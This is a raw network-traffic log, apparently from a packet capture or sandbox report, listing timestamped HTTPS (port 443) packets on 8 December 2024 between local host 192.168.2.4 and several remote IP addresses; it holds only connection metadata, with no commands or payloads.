                                                                          Dec 8, 2024 20:51:30.983143091 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.983155012 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060281992 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060303926 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060347080 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060375929 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.060389042 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060497999 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.060796022 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.060806036 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060834885 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.060944080 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.060970068 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.061259985 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084490061 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084536076 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.084640980 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084769011 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084769011 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084775925 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.084816933 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.084875107 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084884882 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084884882 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.084904909 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.085028887 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.085030079 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.085038900 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.085041046 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.085282087 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.085319042 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.085472107 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.085472107 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:31.085494995 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:31.208610058 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.209001064 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.209022999 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.209430933 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.209436893 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.304480076 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.304538965 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.304730892 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.304730892 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.304780006 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.304795980 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.307158947 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.307195902 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.307356119 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.307429075 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.307436943 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.386807919 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.388135910 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.388137102 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.388170004 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.388180017 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.450287104 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.452037096 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.452069998 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.452464104 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.452472925 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.645729065 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.645801067 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.651484966 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.704951048 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.704986095 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.705040932 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.705048084 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.708415985 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.708470106 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.708621025 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.708822012 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.708834887 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.826535940 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.826591969 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.826742887 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.863456964 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.863467932 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.863497972 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.863502979 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.867353916 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.867372990 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.870265007 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.870265007 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.870290041 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.890985012 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.891069889 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.894062042 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.894062042 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.895345926 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.895365000 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.899354935 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.899386883 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.899481058 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.899606943 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:31.899617910 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:31.978708029 CET44349871104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:31.979017019 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.979032040 CET44349871104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:31.979934931 CET44349871104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:31.980017900 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.980597973 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.980597973 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.980643988 CET44349871104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:31.980705023 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.980808020 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.980973005 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.981012106 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:31.981394053 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.981394053 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:31.981422901 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:32.465317011 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:32.465811014 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:32.465847015 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:32.466475964 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:32.466481924 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:32.466531038 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:32.466540098 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:32.700156927 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:32.701071024 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:32.701117992 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:32.701776028 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:32.701782942 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.019217968 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.019222021 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.019224882 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.019678116 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.019690990 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.019707918 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.019712925 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.020314932 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.020319939 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.020354986 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.020364046 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.020553112 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.020562887 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.020597935 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.020605087 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.020750046 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.020765066 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.021159887 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.021167040 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.021183968 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.021199942 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.242944002 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.242964983 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.242964029 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243002892 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243021965 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243037939 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.243067980 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243086100 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243089914 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.243089914 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.243189096 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.243324041 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.243324041 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.243339062 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243343115 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243500948 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.243505001 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.243544102 CET49876443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.243549109 CET4434987620.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.245372057 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.245488882 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:33.246207952 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.246237040 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.246479988 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.246483088 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:33.246498108 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:33.246507883 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.246526003 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.246862888 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:33.247034073 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.247040033 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.247047901 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.247064114 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.247390032 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:33.247457027 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:33.247569084 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:33.247656107 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:33.247661114 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:33.531727076 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.532731056 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.532731056 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.532761097 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.532773018 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.693947077 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.694013119 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.694307089 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.694307089 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.694498062 CET49877443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.694513083 CET4434987713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.697015047 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.697056055 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.697215080 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.697329998 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.697346926 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.751539946 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.751703024 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.752105951 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.752126932 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.752733946 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.752737045 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.752738953 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.752763987 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.753386021 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.753393888 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.784857988 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.784887075 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.784930944 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.784949064 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.784964085 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.785053968 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.785316944 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.785331964 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.785372972 CET49873443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.785378933 CET4434987320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.809366941 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.809382915 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.809417963 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.809463978 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.809495926 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.809614897 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.809838057 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.809838057 CET49874443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.809851885 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.809859991 CET4434987420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.811292887 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.811319113 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.811350107 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.811386108 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.811405897 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.811495066 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.813714981 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.813714981 CET49875443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:33.813726902 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.813734055 CET4434987520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:33.967463017 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.967509985 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.967609882 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.967793941 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.967793941 CET49878443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.967799902 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.967808008 CET4434987813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.970071077 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.970103979 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:33.970220089 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.970308065 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:33.970316887 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.188950062 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.189001083 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.189058065 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.189234018 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.189245939 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.189270020 CET49880443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.189279079 CET4434988013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.189860106 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.189913988 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.189979076 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.190082073 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.190103054 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.190110922 CET49879443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.190116882 CET4434987913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.192327976 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.192353010 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.192353964 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.192380905 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.192420006 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.192440987 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.192569971 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.192579985 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.192687035 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.192697048 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.528986931 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:34.529090881 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:34.529144049 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:34.529680014 CET49881443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:34.529700994 CET44349881104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:34.533020973 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:34.533052921 CET44349887172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:34.533113956 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:34.533401966 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:34.533421993 CET44349887172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:34.977278948 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.977720022 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.977752924 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:34.978225946 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:34.978231907 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.452199936 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.452265024 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.452466965 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.452466965 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.453434944 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.453464985 CET49882443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.453480005 CET4434988213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.453895092 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.453923941 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.454935074 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.454936028 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.454940081 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.454971075 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.455166101 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.455229998 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.455236912 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.700800896 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.701550007 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.701550007 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.701575041 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.701586962 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.786197901 CET44349887172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:35.786425114 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.786451101 CET44349887172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:35.787331104 CET44349887172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:35.787440062 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.787763119 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.787763119 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.787822008 CET44349887172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:35.787837029 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.787905931 CET49887443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.788162947 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.788208008 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:35.788351059 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.788516045 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:35.788527012 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:35.888449907 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.888513088 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.890089989 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.890089989 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.890322924 CET49883443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.890336037 CET4434988313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.892435074 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.892472982 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.892673016 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.892673016 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.892702103 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.918637037 CET4434988513.107.246.63192.168.2.4
